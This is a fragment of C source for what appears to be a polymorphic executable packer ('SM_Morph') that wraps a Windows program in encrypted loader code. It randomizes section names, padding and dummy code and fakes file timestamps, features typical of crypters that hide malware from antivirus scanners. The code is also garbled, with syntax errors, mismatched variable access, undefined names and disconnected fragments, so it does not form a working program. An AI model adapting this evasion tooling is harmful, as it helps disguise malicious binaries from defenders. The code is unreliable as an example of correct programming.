    for( i = 1; i < ExeDef->FileHdr.NumberOfSections; i++ ) {
      sh = &ExeDef->Sections[ i ];
      sh->VirtualAddress = VA;
      sh->PointerToRawData = Offset;
      switch( ExeDef->SectionOrder[ i - 1 ] ) {
        case SECTION_DATA:
          lstrcpy( sh->Name,
                   DataSectionNames[ Rand() % DataSectionNamesCount ] );
          sh->SizeOfRawData = Diff * PERCENT_DATA_SIZE / 100;
          if( sh->SizeOfRawData < MIN_DATA_SIZE )
            sh->SizeOfRawData = MIN_DATA_SIZE;
          sh->SizeOfRawData = (sh->SizeOfRawData + FILE_ALIGNMENT - 1)
                                             & ~(FILE_ALIGNMENT - 1);
          DataSize += (sh->SizeOfRawData + SECTION_ALIGNMENT - 1)
                                             & ~(SECTION_ALIGNMENT - 1);
          sh->Characteristics = 0xC0000040;
          if( ! FileWriteRandom( sh->PointerToRawData, ExeDef->HOut,
                                 sh->SizeOfRawData - FILE_ALIGNMENT
                                   + Rand() % FILE_ALIGNMENT ) ) return FALSE;
          break;
        case SECTION_RDATA:
          lstrcpy( sh->Name,
                   RdataSectionNames[ Rand() % RdataSectionNamesCount ] );
          sh->SizeOfRawData = Diff * PERCENT_RDATA_SIZE / 100;
          if( sh->SizeOfRawData < MIN_RDATA_SIZE )
            sh->SizeOfRawData = MIN_RDATA_SIZE;
          sh->SizeOfRawData = (sh->SizeOfRawData + FILE_ALIGNMENT - 1)
                                             & ~(FILE_ALIGNMENT - 1);
          DataSize += (sh->SizeOfRawData + SECTION_ALIGNMENT - 1)
                                             & ~(SECTION_ALIGNMENT - 1);
          sh->Characteristics = 0x40000040;
          if( ! FileWriteRandom( sh->PointerToRawData, ExeDef->HOut,
                                 sh->SizeOfRawData - FILE_ALIGNMENT
                                   + Rand() % FILE_ALIGNMENT ) ) return FALSE;
          break;
        case SECTION_BSS:
          lstrcpy( sh->Name,
                   BssSectionNames[ Rand() % BssSectionNamesCount ] );
          sh->PointerToRawData = 0;
          sh->Characteristics = 0xC0000080;
          Bssh = sh;
          break;
        case SECTION_IMPORT:
          lstrcpy( sh->Name,
                   IdataSectionNames[ Rand() % IdataSectionNamesCount ] );
          sh->SizeOfRawData = (ExeDef->IDataSize + FILE_ALIGNMENT - 1)
                                             & ~(FILE_ALIGNMENT - 1);
          DataSize += (sh->SizeOfRawData + SECTION_ALIGNMENT - 1)
                                             & ~(SECTION_ALIGNMENT - 1);
          sh->Characteristics = 0x40000040;
          ExeDef->IdataSectionIdx = i;
          break;
      }
      VA += (sh->SizeOfRawData + SECTION_ALIGNMENT - 1)
                                             & ~(SECTION_ALIGNMENT - 1);
      if( ExeDef->SectionOrder[ i - 1 ] != SECTION_BSS )
        Offset += sh->SizeOfRawData;
      Dbg4( "%s section VA %08X, raw data offset %08X, raw data size %08X bytes",
            sh->Name, sh->VirtualAddress, sh->PointerToRawData, sh->SizeOfRawData );
    }
    if( Bssh ) {
      if( Diff < DataSize );
        Bssh->SizeOfRawData = MIN_BSS_SIZE;
      else {
        Bssh->SizeOfRawData = Diff - DataSize;
        if( Bssh->SizeOfRawData < MIN_BSS_SIZE )
          Bssh->SizeOfRawData = MIN_BSS_SIZE;
      }
      sh->SizeOfRawData = (sh->SizeOfRawData + FILE_ALIGNMENT - 1)
                                         & ~(FILE_ALIGNMENT - 1);
      ExeDef->OptHdr.SizeOfUninitializedData = Bssh->SizeOfRawData;
    }
    return TRUE;
  }

static BOOL BuildIDataSection( EXEDEF* ExeDef )
  {
    DWORD  *dp, *nameaddr, *addraddr;
    DWORD  f, i, j, s, half, curr;
    BYTE   *Names;
    char   *Func;
    BOOL   GroupModuleNames;

    Dbg( "building .idata section" );

    /* allocate memory for idata section
    */
    if( (ExeDef->Idata = MemAllocate( ExeDef->IdataSize )) == NULL )
      return FALSE;

    i = (1 + ExeDef->ImportModuleCount) * sizeof(IMAGE_IMPORT_MODULE_DIRECTORY);
    RtlZeroMemory( ExeDef->Idata, i );
    dp = (DWORD*) (ExeDef->Idata + i);
    for( half = i = 0; i < ExeDef->ImportModuleCount; i++ )
      half += ExeDef->ImportFunctionCount[ i ] + 1;
    curr = 0;
    Names = (BYTE*) (dp + 2 * half);

    GroupModuleNames = Rand() % 1;

    if( GroupModuleNames ) {

      // put module names first

      for( i = j = 0; i < ExeDef->ImportModuleCount; i++ )
        if( ExeDef->ModuleImpCount[ i ] != 0 ) {
          *((DWORD*)(ExeDef->Idata + j * sizeof(IMAGE_IMPORT_MODULE_DIRECTORY) + 12)) = // set module name va
                   (Names - ExeDef->IdataBuf) + ExeDef->IdataSectionVA;
          j++;
          lstrcpy( Names, ExeDef->ModuleName[ i ] );
          Names += lstrlen( ExeDef->ModuleName[ i ] ) + 1;
        }
    }

    for( i = j = 0; i < MODULE_COUNT; i++ )
      if( ExeDef->ModuleImpCount[ i ] != 0 ) {

        if( ! GroupModuleNames ) {

          // put module name

          *((DWORD*)(ExeDef->IdataBuf + j * 20 + 12)) = // set module name va
                   (Names - ExeDef->IdataBuf) + ExeDef->IdataSectionVA;
          lstrcpy( Names, ExeDef->ModuleName[ i ] );
          Names += lstrlen( ExeDef->ModuleName[ i ] ) + 1;
        }

        // put function names and set name and address va

        if( ExeDef->SplitNameAddr ) {
          nameaddr = dp + curr;
          addraddr = dp + half + curr;
        }
        else {
          nameaddr = dp + 2 * curr;
          addraddr = dp + 2 * curr + ExeDef->ModuleImpCount[ i ] + 1;
        }
        *((DWORD*)(ExeDef->IdataBuf + j * 20)) = // set function names va
                 (((BYTE*)nameaddr) - ExeDef->IdataBuf) + ExeDef->IdataSectionVA;
        *((DWORD*)(ExeDef->IdataBuf + j * 20 + 16)) = // set function address va
                 (((BYTE*)addraddr) - ExeDef->IdataBuf) + ExeDef->IdataSectionVA;
        *(nameaddr + ExeDef->ModuleImpCount[ i ]) = 0;
        *(addraddr + ExeDef->ModuleImpCount[ i ]) = 0;

        if( ExeDef->ModuleOrder[ i ] == MODULE_WINSOCK ) {
#         ifdef TEST
            wsprintf( DbgMsg, "names for winsock (%s)\r\n", ExeDef->ModuleName[ i ] );
            DbgOut();
#         endif
          RtlMoveMemory( nameaddr, ExeDef->ModuleImp[ i ],
                         ExeDef->ModuleImpCount[ i ] * sizeof( DWORD ) );
          RtlMoveMemory( addraddr, ExeDef->ModuleImp[ i ],
                         ExeDef->ModuleImpCount[ i ] * sizeof( DWORD ) );
        }
        else {
#         ifdef TEST
            wsprintf( DbgMsg, "names for %s\r\n", ExeDef->ModuleName[ i ] );
            DbgOut();
#         endif
          for( f = 0; f < ExeDef->ModuleImpCount[ i ]; f++ ) {
            *(nameaddr + f) = (Names - ExeDef->IdataBuf + ExeDef->IdataSectionVA);
            *(addraddr + f) = (Names - ExeDef->IdataBuf + ExeDef->IdataSectionVA);
            *((WORD*)Names) = (WORD) (f + 1);
            Names += sizeof(WORD);
            Func = ExeDef->ModuleFunc[ i ][ ExeDef->ModuleImp[ i ][ f ] ];
            lstrcpy( Names, Func );
            Names += lstrlen( Func ) + 1;
          }
        }
        curr += ExeDef->ModuleImpCount[ i ] + 1;
        j++;
      }
    *Sz = Names - ExeDef->IdataBuf;   // size of idata section

    // now write idata section body

#   ifdef TEST
      wsprintf( DbgMsg, "writing idata section body: %d bytes\r\n", *Sz );
      DbgOut();
#   endif
    if( ! FileWrite( Fh, ExeDef->IdataBuf, *Sz ) ) return FALSE;

    return TRUE;
  }

static void BuildIAT( EXEDEF* ExeDef )
  {
    DWORD  i, j, k, n, x;

    Dbg( "building IAT" );

    i = 0; // offset in IAT buffer
    n = (ExeDef->ImportModuleCount + 1) * 20;  // import module directory size
    if( ExeDef->SplitNameAddr ) // if tables are splitted, add name table size
      n += (ExeDef->TotalImports[ j ] + ExeDef->ImportModuleCount) * sizeof(DWORD);
    x = 0; // function counter
    for( j = 0; j < ExeDef->ImportModuleCount; j++ ) {
      for( k = 0; k < ExeDef->ImportFunctionCount[ j ]; k++ ) {
        ExeDef->IATBuf[ i++ ] = 0xFF;
        ExeDef->IATBuf[ i++ ] = 0x25;
        if( ExeDef->SplitNameAddr ) {
          *((DWORD*)(ExeDef->IATBuf + i)) = ExeDef->IdataSectionVA + n
                + (x * sizeof(DWORD)) // previous names/addresses
                + k * sizeof(DWORD)
                + IMAGE_BASE;
        }
        else {
          *((DWORD*)(ExeDef->IATBuf + i)) = ExeDef->IdataSectionVA + n
                + (x * 2 * sizeof(DWORD)) // previous names/addresses
                + (ExeDef->ImportFunctionCount[ j ] + 1) * sizeof(DWORD) // names
                + k * sizeof(DWORD)
                + IMAGE_BASE;
        }
        AddRelocation( ExeDef->Sections[0].VirtualAddress
                                     + i + ExeDef->IATOffset, ExeDef );
        i += 4;
      }
      x += ExeDef->ImportFunctionCount[ j ] + 1;
    }
  }

BOOL SM_Morph( BYTE* SrcFile, DWORD SrcFileSize,
               HANDLE Dest,
               BOOL UseOriginalStub,
               BOOL UseKernelTime,
               DWORD DummyCodeSize,
               BOOL CopyResources )
  {
    EXEDEF  ExeDef;
    BOOL    Rc;
    DWORD   i;

    Dbg( "*************************** SM_Morph ****************************" );

    /* check source
    */
    if( (PIMAGE_DOS_HEADER) SrcFile->e_magic != IMAGE_DOS_SIGNATURE ) {
      Dbg( "file does not contain DOS header" );
      return FALSE;
    }
    if( (PIMAGE_DOS_HEADER) SrcFile->e_cparhdr != 4 ) {
      Dbg( "wrong file (DOS header too small)" );
      return FALSE;
    }
    ExeDef.oSrcFileHdr = (PIMAGE_DOS_HEADER) SrcFile->e_lfanew;
    if( *((DWORD*) (SrcFile + ExeDef.oSrcFileHdr )) != IMAGE_NT_SIGNATURE ) {
      Dbg( "file does not contain PE signature" );
      return FALSE;
    }
    ExeDef.oSrcFileHdr += 4;

    /* initialize rnd generator
    */
    SRand( GetTickCount() );

    /* initialize some exedef's fields
    */
    ExeDef.Src = SrcFile;
    ExeDef.SrcSize = SrcFileSize;
    ExeDef.HOut = Dest;
    if( DummyCodeSize < MIN_DUMMY_CODE_SIZE )
      DummyCodeSize = MIN_DUMMY_CODE_SIZE;
    if( DummyCodeSize > MAX_DUMMY_CODE_SIZE )
      DummyCodeSize = MAX_DUMMY_CODE_SIZE;
    ExeDef.DummyCodeSize = DummyCodeSize;

    /* initialize headers - copy them from source file
       and set some parameters
    */
    RtlMoveMemory( &ExeDef->FileHdr,
                   SrcFile + ExeDef.oSrcFileHdr, sizeof(IMAGE_FILE_HEADER) );
    RtlMoveMemory( &ExeDef->OptHdr,
                   SrcFile + ExeDef.oSrcFileHdr + sizeof(IMAGE_FILE_HEADER),
                   sizeof(IMAGE_OPTIONAL_HEADER) );
    RtlZeroMemory( &ExeDef->Sections, sizeof( ExeDef->Sections ) );
    ExeDef.FileHdr.PointerToSymbolTable = 0;
    ExeDef.FileHdr.NumberOfSymbols = 0;
    ExeDef.FileHdr.SizeOfOptionalHeader = sizeof(IMAGE_OPTIONAL_HEADER);
    ExeDef.OptHdr.ImageBase = IMAGE_BASE;
    ExeDef.OptHdr.SectionAlignment = SECTION_ALIGNMENT;
    ExeDef.OptHdr.FileAlignment = FILE_ALIGNMENT;
    ExeDef.OptHdr.CheckSum = 0;
    ExeDef.OptHdr.NumberOfRvaAndSizes = 16;

    /* initialize subsystem-dependent fields
    */
    if( ExeDef.OptHdr.Subsystem == IMAGE_SUBSYSTEM_NATIVE ) {
      ExeDef.Imports = NativeImports;
      ExeDef.ImportsSize = NATIVE_IMPORTS_SIZE;
      //ExeDef.LdrCode = nLoaderCode;
      //ExeDef.LdrCodeSize = nLoaderCodeSize;
      //ExeDef.LdrImportsOffset = nLoaderITOffset;
      //ExeDef.LdrImportsSize = nLoaderITSize;
      //ExeDef.Prologue = nPTable;
      //ExeDef.PrologueSize = nPTableSize;
      //ExeDef.PrologueImports = nPImpTable;
      //ExeDef.PrologueImportsSize = nPImpTableSize;
      Dbg( "not implemented yet: NATIVE subsystem" );
      return FALSE;
    }
    else {
      ExeDef.Imports = Win32Imports;
      ExeDef.ImportsSize = WIN32_IMPORTS_SIZE;
      ExeDef.LdrCode = wLoaderCode;
      ExeDef.LdrCodeSize = wLoaderCodeSize;
      ExeDef.LdrImportsOffset = wLoaderITOffset;
      ExeDef.LdrImportsSize = wLoaderITSize;
      ExeDef.Prologue = wPTable;
      ExeDef.PrologueSize = wPTableSize;
      ExeDef.PrologueImports = wPImpTable;
      ExeDef.PrologueImportsSize = wPImpTableSize;
    }

    if( ExeDef->PrologueSize > MAX_PROLOGUE_INSTRUCTIONS ) {
      Dbg( "increase MAX_PROLOGUE_INSTRUCTIONS or eliminate this constant" );
      return FALSE;
    }

    if( UseKernelTime ) {
      ExeDef.FileHdr.TimeDateStamp = GetKernelTimeStamp( &ExeDef.KernelTime );
      if( ExeDef.FileHdr.TimeDateStamp == 0 ) return FALSE;
    }

    /* generate key for encryption (xor values)
    */
    for( i = 0; i < 4; i++ ) ExeDef->Keys[ i ] = Rand();

    /* adjust CopyResources parameter (and set pointer to resource
       section header)
    */
    if( CopyResources ) {
      if( (ExeDef.SrcRsrc = PEfileDirectoryEntryToSectionHeader( SrcFile,
                                   IMAGE_DIRECTORY_ENTRY_RESOURCE )) == NULL )
        CopyResources = FALSE;
    }
    else
      ExeDef.SrcRsrc = NULL;  // don't create resource section in output file

    /* define number and order of additional sections (.data,
       .rdata, .bss, .rsrc);
       so we can calcuate size of headers
    */
    DefineSectionOrder( ExeDef );
    ExeDef.OptHdr.SizeOfHeaders = (ExeDef.PEHdrOffset + 4
                                   + sizeof(IMAGE_FILE_HEADER)
                                   + sizeof(IMAGE_OPTIONAL_HEADER)
                                   + sizeof(IMAGE_SECTION_HEADER)
                                         * ExeDef.FileHdr.NumberOfSections
                                   + FILE_ALIGNMENT-1) & ~(FILE_ALIGNMENT-1);

    /* write stub and reserve space for header
    */
    if( ! WriteStub( &ExeDef, UseOriginalStub ) ) return FALSE;
    if( ! FileSeek( Dest, ExeDef.OptHdr.SizeOfHeaders ) ) return FALSE;

    /* allocate buffers (plus 32 bytes to allow a little overflow)
    */
    if( (ExeDef.Code = MemAlloc( DummyCodeSize
                                 + LoaderCodeSize + 32 )) == NULL )
      return FALSE

    GeneratePrologue( &ExeDef );

    /* now prologue code has been generated, we know its exact size and can
       reserve space in the destination file and append source file
       (end of code aligned on 4 bytes boundary - this is required for
        encryption)
    */
    if( AppendSourceFile( &ExeDef ) )

    /* now we know total code size;
       define imports
    */
    if( DefineIdata( &ExeDef ) ) { // this function will allocate memory
                                   // for arrays and IAT buffer

      /* ok, we know the exact size of .idata section;
         now we know IAT size (6 * TotalImports) and it's possible to
         define VA for each section except .reloc (and .rsrc, because .reloc
         may preceede .rsrc)
      */
      if( DefineSections() )  // also, write .data and .rdata

      /* initialize relocation buffer
      */
      ExeDef->RelocLastVA = 0;
      ExeDef->RelocBufIdx = 0;

      /* tune prologue code (start to add relocations) and loader
      */
      TunePrologue( &ExeDef );
      TuneLoader( &ExeDef );

      /* build IAT (continue to add relocations sequentially)
      */
      BuildIAT( &ExeDef );

      /* write code section (prologue, loader and IAT)
      */

      /* ok, now we know the size of .reloc section;
         write last one or two sections: .reloc and .rsrc
         and set size of image
      */

      /* build and write idata
      */
      if( BuildIDataSection( &ExeDef ) ) { //this function will allocate memory

        /* write headers
        */
        ExeDef.OptHdr.AddressOfEntryPoint = ExeDef->EntryPoint + ExeDef->CodeSectionVA;

        /* free idata buffer
        */
        MemFree( ExeDef.Idata );
      }
      MemFree( ExeDef.ImportFunctionIndex[0] );
    }

    /* free buffers
    */
    MemFree( ExeDef.Code );

    /* finally, set time if required
    */
    if( Rc && UseKernelTime ) {
      if( ! SetFileTime( Dest, NULL, NULL, &ExeDef.KernelTime ) ) {
        Dbg1( "cannot set file time, error %d", GetLastError() );
        return FALSE;
      }
    }
    return Rc;
  }
























/*
  scans image for winsock import function names
*/
static DWORD* GetWinsockImportNames( BYTE* p )
  {
    IMAGE_OPTIONAL_HEADER  *oh;
    IMAGE_SECTION_HEADER   *sh;
    DWORD  iaddr, isize, scount, i, isecva;
    BYTE   *isec;
    
    // get optional header ptr

    oh = (IMAGE_OPTIONAL_HEADER*) OPTHDROFFSET( p );
    iaddr = oh->DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ].VirtualAddress;
    isize = oh->DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ].Size;
#   ifdef TEST
      wsprintf( DbgMsg, "GetWinsockImportNames: optional header at %08X, import table addr 0x%X, size 0x%X\r\n", (unsigned) (((char*) oh) - p), iaddr, isize );
      DbgOut();
#   endif

    // scanning sections for imports

    scount = ((IMAGE_FILE_HEADER*) PEFHDROFFSET( p ))->NumberOfSections;
    sh = (IMAGE_SECTION_HEADER*) SECHDROFFSET( p );
    for( i = 0; i < scount; i++, sh++ ) {
      if( iaddr >= sh->VirtualAddress &&
          iaddr < sh->VirtualAddress + sh->SizeOfRawData ) {
        isec = p + sh->PointerToRawData;
        isecva = sh->VirtualAddress - sh->PointerToRawData;
#       ifdef TEST
          wsprintf( DbgMsg, "GetWinsockImportNames: idata section at %08X\r\n", sh->PointerToRawData );
          DbgOut();
#       endif
      }
    }

    // find winsock imports

    for(;;) {
      if( *(DWORD*)(isec + 12) == 0 ) break;
      i = *(DWORD*)(isec + 12) - isecva;
      if( lstrcmpi( (char*) p + i, "wsock32.dll" ) == 0 ) {
        i = *(DWORD*) isec - isecva;
#       ifdef TEST
          wsprintf( DbgMsg, "GetWinsockImportNames: winsock function names at %08X\r\n", i );
          DbgOut();
#       endif
        return (DWORD*) (p + i);
      }
      isec += 20;
    }
#   ifdef TEST
      wsprintf( DbgMsg, "GetWinsockImportNames: winsock is not used\r\n" );
      DbgOut();
#   endif
    return NULL;
  }


    Tmp.PutModulesTogether = Rand() & 1;
    Tmp.SplitNameAddr = Rand() & 1;



    if( ! FileWrite( Fh, ExeDef->CodeBuf,
                     ExeDef->CodeSectionSz ) ) return FALSE;
    if( AlignedCodeSectionSz > ExeDef->CodeSectionSz )
      if( ! FileWrite( Fh, ZeroBytes,
                AlignedCodeSectionSz - ExeDef->CodeSectionSz ) ) return FALSE;
    Offset += AlignedCodeSectionSz;


    // now write other sections and prepare section headers

    SectionOrder = ExeDef->SectionOrder;
    sh[ i ].VirtualAddress = ExeDef->SizeOfImage;
    AdjustPrevSectionSize( Fh, &sh[ i - 1 ], &Offset );

    oh.BaseOfData = sh[1].VirtualAddress;
    oh.SizeOfInitializedData = (ExeDef->DataSectionSz
                      + ActualIdataSectionSz
                      + ExeDef->RdataSectionSz + 511) & ~511;
    oh.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ].VirtualAddress = ExeDef->IdataSectionVA;
    oh.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ].Size = sh[ IdxImport ].SizeOfRawData;//ActualIdataSectionSz;
    oh.DataDirectory[ IMAGE_DIRECTORY_ENTRY_RESOURCE ].VirtualAddress = ExeDef->RsrcSectionVA;
    oh.DataDirectory[ IMAGE_DIRECTORY_ENTRY_RESOURCE ].Size = sh[ IdxRsrc ].SizeOfRawData;//ActualRsrcSectionSz;
    oh.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ].VirtualAddress = ExeDef->RelocSectionVA;
    oh.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ].Size = sh[ IdxReloc ].SizeOfRawData;//ExeDef->RelocBufIdx;


    // write headers

#   ifdef TEST
      wsprintf( DbgMsg, "writing headers\r\n" );
      DbgOut();
#   endif

    if( SetFilePointer( Fh, PEOffset, NULL, FILE_BEGIN ) != PEOffset ) {
#     ifdef TEST
        wsprintf( DbgMsg, "cannot set file pointer to %d, error %d (%08X)\r\n",
                  PEOffset, GetLastError(), GetLastError() );
        DbgOut();
#     endif
      return FALSE;
    }
    i = 0x4550;
    if( ! FileWrite( Fh, &i, sizeof( DWORD ) ) ) return NULL;
    if( ! FileWrite( Fh, &pehdr, sizeof( pehdr ) ) ) return NULL;
    if( ! FileWrite( Fh, &oh, sizeof( oh ) ) ) return NULL;
    if( ! FileWrite( Fh, sh, sizeof( sh[0] ) * ExeDef->NumberOfSections ) )
      return NULL;
    j = SetFilePointer( Fh, 0, NULL, FILE_CURRENT );
    if( j == 0xFFFFFFFF ) {
#     ifdef TEST
        wsprintf( DbgMsg, "cannot get file pointer, error %d (%08X)\r\n",
                  GetLastError(), GetLastError() );
        DbgOut();
#     endif
      return FALSE;
    }
    if( j < oh.SizeOfHeaders )
      if( ! FileWrite( Fh, ZeroBytes, oh.SizeOfHeaders - j ) )
        return NULL;


#   ifdef TEST
      wsprintf( DbgMsg, "tune lcode\r\n" );
      DbgOut();
#   endif
    i++;
    *((DWORD*)(ExeDef->CodeBuf + Ip + i)) = ExeDef->ExeResType;
    i += 4;
    *((DWORD*)(ExeDef->CodeBuf + Ip + i)) = ExeDef->ExeResId;

    // encrypt loader code
#   ifdef TEST
      wsprintf( DbgMsg, "encrypt lcode %08X %08X %08X %08X\r\n",
                ExeDef->XorValues[0], ExeDef->XorValues[1],
                ExeDef->XorValues[2], ExeDef->XorValues[3] );
      DbgOut();
